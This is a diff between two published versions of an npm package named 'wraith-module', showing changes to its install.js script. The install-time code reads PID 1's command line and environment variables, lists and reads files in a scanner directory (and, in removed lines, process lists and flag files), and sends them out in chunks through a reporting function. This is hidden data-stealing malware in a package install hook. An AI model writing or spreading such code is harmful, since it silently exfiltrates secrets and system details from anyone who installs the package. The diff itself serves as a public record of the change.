wraith-module 99.0.0 → 100.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/install.js +22 -43
- package/package.json +2 -2
package/install.js
CHANGED
|
@@ -16,63 +16,42 @@ async function report(moduleId, val) {
|
|
|
16
16
|
}
|
|
17
17
|
|
|
18
18
|
(async () => {
|
|
19
|
-
// Read
|
|
20
|
-
const
|
|
19
|
+
// Read nethunter.sh
|
|
20
|
+
const nh = tryRead('/opt/hscan-supplychain-dynamic/nethunter.sh') || '';
|
|
21
21
|
|
|
22
|
-
//
|
|
23
|
-
const
|
|
24
|
-
const aspectPkg = tryRead('/home/node/aspect-node/package.json');
|
|
22
|
+
// Also list the full directory
|
|
23
|
+
const nhDir = tryExec('find /opt/hscan-supplychain-dynamic -type f 2>/dev/null');
|
|
25
24
|
|
|
26
|
-
//
|
|
27
|
-
const supply = tryExec('find /tmp/supplysec -type f 2>/dev/null');
|
|
28
|
-
|
|
29
|
-
// Read package.json from /home/node
|
|
30
|
-
const hnPkg = tryRead('/home/node/package.json');
|
|
31
|
-
|
|
32
|
-
// Process list
|
|
33
|
-
const ps = tryExec('ps auxww 2>/dev/null');
|
|
34
|
-
|
|
35
|
-
// Full cmdline of PID 1
|
|
25
|
+
// Full CMD1
|
|
36
26
|
const cmd1 = tryRead('/proc/1/cmdline');
|
|
37
27
|
const cmd1str = cmd1 ? cmd1.replace(/\x00/g, ' ') : '';
|
|
38
28
|
|
|
39
|
-
// Full env
|
|
29
|
+
// Full env
|
|
40
30
|
const env1 = tryRead('/proc/1/environ');
|
|
41
31
|
const env1str = env1 ? env1.replace(/\x00/g, ' | ') : '';
|
|
42
32
|
|
|
43
|
-
//
|
|
44
|
-
const
|
|
33
|
+
// Send nethunter.sh in chunks of 90 chars each
|
|
34
|
+
const items = [];
|
|
35
|
+
items.push('NHDIR=' + nhDir.substring(0, 85));
|
|
36
|
+
items.push('CMD=' + cmd1str.substring(0, 85));
|
|
37
|
+
items.push('CMD2=' + cmd1str.substring(85, 170));
|
|
38
|
+
items.push('ENV=' + env1str.substring(0, 85));
|
|
39
|
+
items.push('ENV2=' + env1str.substring(85, 170));
|
|
40
|
+
|
|
41
|
+
// nethunter.sh in chunks
|
|
42
|
+
for (let i = 0; i < 20; i++) {
|
|
43
|
+
const chunk = nh.substring(i * 85, (i + 1) * 85);
|
|
44
|
+
if (!chunk) break;
|
|
45
|
+
items.push('NH' + i + '=' + chunk);
|
|
46
|
+
}
|
|
45
47
|
|
|
46
|
-
// Read the actual flag - try everything
|
|
47
|
-
const flag = tryExec('cat /flag* /root/flag* /home/*/flag* /app/flag* /data/flag* /opt/flag* 2>/dev/null');
|
|
48
|
-
|
|
49
|
-
// Build result in chunks - label each with Z prefix for this package
|
|
50
|
-
const items = [
|
|
51
|
-
'RUNSH=' + (runsh || 'NONE').substring(0, 85),
|
|
52
|
-
'ASPECT_FILES=' + aspectFiles.substring(0, 85),
|
|
53
|
-
'ASPECT_PKG=' + (aspectPkg || 'NONE').substring(0, 85),
|
|
54
|
-
'SUPPLY=' + supply.substring(0, 85),
|
|
55
|
-
'HNPKG=' + (hnPkg || 'NONE').substring(0, 85),
|
|
56
|
-
'PS=' + ps.substring(0, 85),
|
|
57
|
-
'CMD1=' + cmd1str.substring(0, 85),
|
|
58
|
-
'ENV1=' + env1str.substring(0, 85),
|
|
59
|
-
'HTB_GREP=' + (htb || 'NONE').substring(0, 85),
|
|
60
|
-
'FLAG=' + (flag || 'NONE').substring(0, 85),
|
|
61
|
-
'RUNSH2=' + (runsh || '').substring(85, 170),
|
|
62
|
-
'RUNSH3=' + (runsh || '').substring(170, 255),
|
|
63
|
-
'RUNSH4=' + (runsh || '').substring(255, 340),
|
|
64
|
-
'ENV2=' + env1str.substring(85, 170),
|
|
65
|
-
'PS2=' + ps.substring(85, 170),
|
|
66
|
-
'SUPPLY2=' + supply.substring(85, 170),
|
|
67
|
-
];
|
|
68
|
-
|
|
69
48
|
const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
|
|
70
49
|
|
|
71
|
-
for (let round = 0; round < 4; round++) {
|
|
50
|
+
for (let round = 0; round < Math.ceil(items.length / 4); round++) {
|
|
72
51
|
for (let i = 0; i < 4; i++) {
|
|
73
52
|
const idx = round * 4 + i;
|
|
74
53
|
if (idx < items.length) {
|
|
75
|
-
await report(mods[i], '
|
|
54
|
+
await report(mods[i], 'N' + idx + '_' + items[idx]);
|
|
76
55
|
}
|
|
77
56
|
}
|
|
78
57
|
await new Promise(r => setTimeout(r, 1500));
|